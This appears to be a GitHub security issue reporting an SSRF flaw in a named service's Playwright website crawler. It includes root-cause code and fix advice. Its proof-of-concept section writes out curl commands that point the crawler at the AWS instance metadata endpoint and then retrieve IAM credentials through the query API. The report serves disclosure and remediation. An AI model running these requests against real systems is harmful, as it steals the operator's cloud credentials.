Skip to content

Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist #3

@noobx123

Description

@noobx123

Severity : High
CVSS : 8.6 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Endpoint : https://vectorbase.dev/api/sources/create
https://vectorbase.dev/api/v1/sources (POST)

Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist

Summary

The website source crawler in src/lib/crawler.ts uses Playwright to fetch any user-supplied URL and stores the resulting content as searchable chunks. It does not validate that the target URL resolves to a public IP address, enabling any authenticated API key holder to direct the crawler to internal services such as the cloud provider's instance metadata endpoint, then retrieve the exfiltrated content via the query API.

Steps / PoC

  1. Create an API key via the dashboard (requires a working account; note auth is currently broken due to Supabase misconfiguration — this PoC describes the attack once auth is restored or if tested on a self-hosted instance with a valid account).

  2. Create a website source pointing to the AWS IMDS:

curl -s -X POST https://vectorbase.dev/api/sources/create \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{
    "projectId": "<project-uuid>",
    "type": "website",
    "name": "Internal",
    "url": "http://169.254.169.254/latest/meta-data/"
  }'

Expected: source created with processing triggered. The Playwright crawler fetches [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/) and stores the response (EC2 metadata, IAM credentials, etc.) as embedding chunks.

  1. Retrieve the exfiltrated content:
curl -s -X POST https://vectorbase.dev/api/v1/query \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{"query": "iam credentials role", "projectId": "<project-uuid>"}'

Expected: response includes the IMDS content (IAM role name, access key ID, secret, token).

  1. Root cause in src/lib/crawler.ts:
const browser = await chromium.launch()
const page = await browser.newPage()
await page.goto(url, { timeout: 30000, waitUntil: 'domcontentloaded' })
// No IP range check before or after DNS resolution

The crawler sets ignoreHTTPSErrors: true, follows redirects, and has no allowlist filtering on the resolved destination IP. The shouldCrawl helper only filters by file extension and a short hardcoded path list — it does not block RFC 1918 or link-local addresses. The sitemap parser (src/lib/sitemap-parser.ts) has the same gap.

Impact

An API key holder can read the cloud instance metadata endpoint (IAM credentials, user-data scripts), internal HTTP services, and any address reachable from the deployment network, then query the stored chunks to extract the captured content.

Fix

  1. Resolve each URL's destination IP before Playwright fetches it; block RFC 1918 (10/8, 172.16/12, 192.168/16), link-local (169.254/16), loopback (127/8), and the DNS name *.internal.
  2. Re-validate the resolved IP after any redirect, as Playwright follows redirects natively.
  3. Consider a separate egress-restricted network sandbox for the crawler process.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions